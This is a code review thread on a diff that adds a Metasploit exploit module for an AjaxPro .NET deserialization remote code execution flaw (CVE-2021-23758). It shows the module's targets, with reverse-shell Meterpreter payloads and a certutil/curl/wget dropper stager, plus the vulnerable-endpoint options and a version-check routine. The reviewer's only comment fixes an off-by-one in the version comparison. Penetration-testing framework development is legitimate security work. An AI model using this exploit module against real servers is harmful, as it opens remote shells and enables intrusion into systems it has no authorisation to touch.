modules/exploits/windows/http/ajaxpro_deserialization_rce.rb

```diff
@@ -0,0 +1,193 @@
+        'References' => [
+          ['CVE', '2021-23758'],
+          ['URL', 'https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/']
+        ],
+        'DisclosureDate' => '2021-12-03',
+        'License' => MSF_LICENSE,
+        'Platform' => ['windows'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'certutil'
+              },
+              'CmdStagerFlavor' => %w[vbs certutil debug_write debug_asm tftp psh_invokewebrequest curl wget lwp-request],
+              'Notes' => {
+                'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to AjaxPro Handler', '/ajaxpro/']),
+      OptString.new('Namespace', [true, 'Namespace of vulnerable method', 'AjaxPro.Services.ICartService,AjaxPro.2']),
+      OptString.new('Method', [true, 'Name of vulnerable method', 'AddItem']),
+      OptString.new('Parameter', [true, 'Name of vulnerable parameter', 'item'])
+    ])
+
+    @ajax_pro = { ID: 'AjaxPro' }
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'core.ashx'),
+      'keep_cookies' => true
+    )
+    unless res
+      return CheckCode::Unknown("Target did not respond to #{normalize_uri(target_uri.path, 'core.ashx')}")
+    end
+
+    unless res.code == 200 && res.headers['Content-Type'].include?('application/x-javascript')
+      return CheckCode::Safe('Is not AjaxPro?')
+    end
+
+    unless (cap = res.body.match(/ID: ?"(\S+?)",/).captures)
+      return CheckCode::Detected('Failed to get AjaxPro ID.')
+    end
+
+    @ajax_pro[:ID] = cap[0]
+
+    unless (cap = res.body.match(/version: ?"(\S+?)",/).captures)
+      return CheckCode::Detected('Failed to get AjaxPro version.')
+    end
+
+    @ajax_pro[:version] = cap[0]
+
+    if Rex::Version.new(@ajax_pro[:version]) > Rex::Version.new('21.10.30.1')
```

Comment:
Vulnerable version listing from NVD: `Up to (excluding) 21.10.30.1`
https://nvd.nist.gov/vuln/detail/CVE-2021-23758
```suggestion
    if Rex::Version.new(@ajax_pro[:version]) >= Rex::Version.new('21.10.30.1')
```